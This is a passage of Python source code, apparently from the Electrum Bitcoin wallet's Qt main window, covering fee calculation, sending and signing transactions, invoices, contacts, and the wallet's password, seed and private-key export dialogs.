NoDynamicFeeEstimates) as e: if not freeze_fee: self.fee_e.setAmount(None) if not freeze_feerate: self.feerate_e.setAmount(None) self.feerounding_icon.setVisible(False) if isinstance(e, NotEnoughFunds): self.not_enough_funds = True elif isinstance(e, NoDynamicFeeEstimates): try: tx = make_tx(0) size = tx.estimated_size() self.size_e.setAmount(size) except BaseException: pass return except BaseException: self.logger.exception('') return size = tx.estimated_size() self.size_e.setAmount(size) fee = tx.get_fee() fee = None if self.not_enough_funds else fee # Displayed fee/fee_rate values are set according to user input. # Due to rounding or dropping dust in CoinChooser, # actual fees often differ somewhat. if freeze_feerate or self.fee_slider.is_active(): displayed_feerate = self.feerate_e.get_amount() if displayed_feerate is not None: displayed_feerate = quantize_feerate(displayed_feerate) else: # fallback to actual fee displayed_feerate = quantize_feerate(fee / size) if fee is not None else None self.feerate_e.setAmount(displayed_feerate) displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None self.fee_e.setAmount(displayed_fee) else: if freeze_fee: displayed_fee = self.fee_e.get_amount() else: # fallback to actual fee if nothing is frozen displayed_fee = fee self.fee_e.setAmount(displayed_fee) displayed_fee = displayed_fee if displayed_fee else 0 displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None self.feerate_e.setAmount(displayed_feerate) # show/hide fee rounding icon feerounding = (fee - displayed_fee) if fee else 0 self.set_feerounding_text(int(feerounding)) self.feerounding_icon.setToolTip(self.feerounding_text) self.feerounding_icon.setVisible(abs(feerounding) >= 1) if self.max_button.isChecked(): amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount self.amount_e.setAmount(amount_after_all_fees) def from_list_delete(self, item): i = self.from_list.indexOfTopLevelItem(item) self.pay_from.pop(i) self.redraw_from_list() self.update_fee() def from_list_menu(self, position): item = self.from_list.itemAt(position) menu = QMenu() menu.addAction(_("Remove"), lambda: self.from_list_delete(item)) menu.exec_(self.from_list.viewport().mapToGlobal(position)) def set_pay_from(self, coins): self.pay_from = list(coins) self.redraw_from_list() def redraw_from_list(self): self.from_list.clear() self.from_label.setHidden(len(self.pay_from) == 0) self.from_list.setHidden(len(self.pay_from) == 0) def format(x): h = x.get('prevout_hash') return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address') for item in self.pay_from: self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ])) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) def protected(func): '''Password request wrapper. The password is passed to the function as the 'password' named argument. "None" indicates either an unencrypted wallet, or the user cancelled the password request. An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_keystore_encryption(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password def is_send_fee_frozen(self): return self.fee_e.isVisible() and self.fee_e.isModified() \ and (self.fee_e.text() or self.fee_e.hasFocus()) def is_send_feerate_frozen(self): return self.feerate_e.isVisible() and self.feerate_e.isModified() \ and (self.feerate_e.text() or self.feerate_e.hasFocus()) def get_send_fee_estimator(self): if self.is_send_fee_frozen(): fee_estimator = self.fee_e.get_amount() elif self.is_send_feerate_frozen(): amount = self.feerate_e.get_amount() # sat/byte feerate amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate fee_estimator = partial( simple_config.SimpleConfig.estimate_fee_for_feerate, amount) else: fee_estimator = None return fee_estimator def read_send_tab(self): label = self.message_e.text() if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) fee_estimator = self.get_send_fee_estimator() coins = self.get_coins() return outputs, fee_estimator, label, coins def check_send_tab_outputs_and_show_errors(self, outputs) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.address is None: self.show_error(_('Bitcoin Address is None')) return True if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address): self.show_error(_('Invalid Bitcoin Address')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def do_preview(self): self.do_send(preview = True) def do_send(self, preview = False): if run_hook('abort_send', self): return outputs, fee_estimator, tx_desc, coins = self.read_send_tab() if self.check_send_tab_outputs_and_show_errors(outputs): return try: is_sweep = bool(self.tx_external_keypairs) tx = self.wallet.make_unsigned_transaction( coins, outputs, self.config, fixed_fee=fee_estimator, is_sweep=is_sweep) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: self.show_message(str(e)) return except InternalAddressCorruption as e: self.show_error(str(e)) raise except BaseException as e: self.logger.exception('') self.show_message(str(e)) return amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs)) fee = tx.get_fee() use_rbf = self.config.get('use_rbf', True) if use_rbf: tx.set_rbf(True) if fee < self.wallet.relayfee() * tx.estimated_size() / 1000: self.show_error('\n'.join([ _("This transaction requires a higher fee, or it will not be propagated by your current server"), _("Try to raise your transaction fee, or use a server with a lower relay fee.") ])) return if preview: self.show_transaction(tx, tx_desc) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) return # confirmation dialog msg = [ _("Amount to be sent") + ": " + self.format_amount_and_units(amount), _("Mining fee") + ": " + self.format_amount_and_units(fee), ] x_fee = run_hook('get_tx_extra_fee', self.wallet, tx) if x_fee: x_fee_address, x_fee_amount = x_fee msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) ) feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE if fee > feerate_warning * tx.estimated_size() / 1000: msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high.")) if self.wallet.has_keystore_encryption(): msg.append("") msg.append(_("Enter your password to proceed")) password = self.password_dialog('\n'.join(msg)) if not password: return else: msg.append(_('Proceed?')) password = None if not self.question('\n'.join(msg)): return def sign_done(success): if success: if not tx.is_complete(): self.show_transaction(tx) self.do_clear() else: self.broadcast_transaction(tx, tx_desc) self.sign_tx_with_password(tx, sign_done, password) @protected def sign_tx(self, tx, callback, password): self.sign_tx_with_password(tx, callback, password) def sign_tx_with_password(self, tx, callback, password): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. ''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if self.tx_external_keypairs: # can sign directly task = partial(Transaction.sign, tx, self.tx_external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx, tx_desc): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Payment request has expired") status = False try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: msg = e.get_message_for_gui() except BestEffortRequestFailed as e: msg = repr(e) else: status, msg = True, tx.txid() if pr and status is True: self.invoices.set_paid(pr, tx.txid()) self.invoices.save() self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}") return status, msg # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: status, msg = result if status: if tx_desc is not None and tx.is_complete(): self.wallet.set_label(tx.txid(), tx_desc) parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() self.do_clear() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b): self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoice(self, key): self.invoices.remove(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = self.invoices.add(pr) status = self.invoices.get_status(key) self.invoice_list.update() if status == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point)) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(pr.error) self.payment_request = None self.do_clear() def on_pr(self, request): self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() r = out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.not_enough_funds = False self.payment_request = None self.payto_e.is_pr = False for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.feerate_e]: e.setText('') e.setFrozen(False) self.fee_slider.activate() self.feerate_e.setAmount(self.config.fee_per_byte()) self.size_e.setAmount(0) self.feerounding_icon.setVisible(False) self.set_pay_from([]) self.tx_external_keypairs = {} self.update_status() run_hook('do_clear', self) def set_frozen_state_of_addresses(self, addrs, freeze: bool): self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() self.update_fee() def set_frozen_state_of_coins(self, utxos, freeze: bool): self.wallet.set_frozen_state_of_coins(utxos, freeze) self.utxo_list.update() self.update_fee() def create_list_tab(self, l, toolbar=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) vbox.setContentsMargins(0, 0, 0, 0) vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) toolbar = l.create_toolbar(self.config) toolbar_shown = self.config.get('show_toolbar_addresses', False) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = l = UTXOList(self) return self.create_list_tab(l) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) return self.create_list_tab(l) def remove_address(self, addr): if self.question(_("Do you want to remove {} from your wallet?").format(addr)): self.wallet.delete_address(addr) self.need_update.set() # history, addresses, coins self.clear_receive_tab() def get_coins(self): if self.pay_from: return self.pay_from else: return self.wallet.get_spendable_coins(None, self.config) def spend_coins(self, coins): self.set_pay_from(coins) self.show_send_tab() self.update_fee() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_invoice(self, key): pr = self.invoices.get(key) if pr is None: self.show_error('Cannot find payment request in wallet.') return pr.verify(self.contacts) self.show_pr_details(pr) def show_pr_details(self, pr): key = pr.get_id() d = WindowModalDialog(self, _("Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0) grid.addWidget(QLabel(pr.get_requestor()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs())) grid.addWidget(QLabel(outputs_str), 1, 1) expires = pr.get_expiration_date() grid.addWidget(QLabel(_("Memo") + ':'), 2, 0) grid.addWidget(QLabel(pr.get_memo()), 2, 1) grid.addWidget(QLabel(_("Signature") + ':'), 3, 0) grid.addWidget(QLabel(pr.get_verify_status()), 3, 1) if expires: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(expires)), 4, 1) vbox.addLayout(grid) def do_export(): name = str(key) + '.bip70' fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70") if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('Invoice saved as' + ' ' + fn)) exportButton = EnterButton(_('Save'), do_export) def do_delete(): if self.question(_('Delete invoice?')): self.invoices.remove(key) self.history_list.update() self.invoice_list.update() d.close() deleteButton = EnterButton(_('Delete'), do_delete) vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d))) d.exec_() def do_pay_invoice(self, key): pr = self.invoices.get(key) self.payment_request = pr self.prepare_for_payment_request() pr.error = None # this forces verify() to re-run if pr.verify(self.contacts): self.payment_request_ok() else: self.payment_request_error() def create_console_tab(self): from .console import Console self.console = console = Console() return console def update_console(self): console = self.console console.history = self.config.get("console-history",[]) console.history_index = len(console.history) console.updateNamespace({ 'wallet': self.wallet, 'network': self.network, 'plugins': self.gui_object.plugins, 'window': self, 'config': self.config, 'electrum': electrum, 'daemon': self.gui_object.daemon, 'util': util, 'bitcoin': bitcoin, }) c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args: f(method, args, self.password_dialog) for m in dir(c): if m[0]=='_' or m in ['network','wallet','config']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) self.balance_label = QLabel("Loading wallet...") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.update_check_button = QPushButton("") self.update_check_button.setFlat(True) self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor)) self.update_check_button.setIcon(read_QIcon("update.png")) self.update_check_button.hide() sb.addPermanentWidget(self.update_check_button) self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog ) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) ) self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog ) sb.addPermanentWidget(self.seed_button) self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self)) sb.addPermanentWidget(self.status_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def update_lock_icon(self): icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.may_have_password()) self.send_button.setVisible(not self.wallet.is_watching_only()) def change_password_dialog(self): from electrum.storage import STO_EV_XPUB_PW if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(str(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): tab = self.tabs.currentWidget() #if hasattr(tab, 'searchable_list'): # tab.searchable_list.toggle_toolbar() #return self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(280) line2 = QLineEdit() line2.setFixedWidth(280) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_master_public_keys(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) mpk_list = self.wallet.get_master_public_keys() vbox = QVBoxLayout() wallet_type = self.wallet.storage.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) vbox.addLayout(grid) if self.wallet.is_deterministic(): mpk_text = ShowQRTextEdit() mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) def show_mpk(index): mpk_text.setText(mpk_list[index]) # only show the combobox in case multiple accounts are available if len(mpk_list) > 1: def label(key): if isinstance(self.wallet, Multisig_Wallet): return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )' return '' labels = [label(i) for i in range(len(mpk_list))] on_click = lambda clayout: show_mpk(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click) vbox.addLayout(labels_clayout.layout()) else: vbox.addWidget(QLabel(_("Master Public Key"))) show_mpk(0) vbox.addWidget(mpk_text) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(dialog))) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(str(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None): if not data: return d = QRDialog(data, parent or self, title) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk, redeem_script = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(str(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) if redeem_script: vbox.addWidget(QLabel(_("Redeem Script") + ':')) rds_e = ShowQRTextEdit(text=redeem_script) rds_e.addCopyButton(self.app) vbox.addWidget(rds_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. Not just in Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, txt): from electrum.transaction import tx_from_str try: tx = tx_from_str(txt) return Transaction(tx) except BaseException as e: self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e)) return def read_tx_from_qrcode(self): from electrum import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except BaseException as e: self.show_error(str(e)) return if not data: return # if the user scanned a bitcoin URI if str(data).startswith("bitcoin:"): self.pay_to_URI(data) return # else if the user scanned an offline signed tx try: data = bh2u(bitcoin.base_decode(data, length=None, base=43)) except BaseException as e: self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e))) return tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self): fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn") if not fileName: return try: with open(fileName, "r") as f: file_content = f.read() except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction")) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + str(e)) return tx = transaction.Transaction(raw_tx) self.show_transaction(tx) @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password)[0] private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) 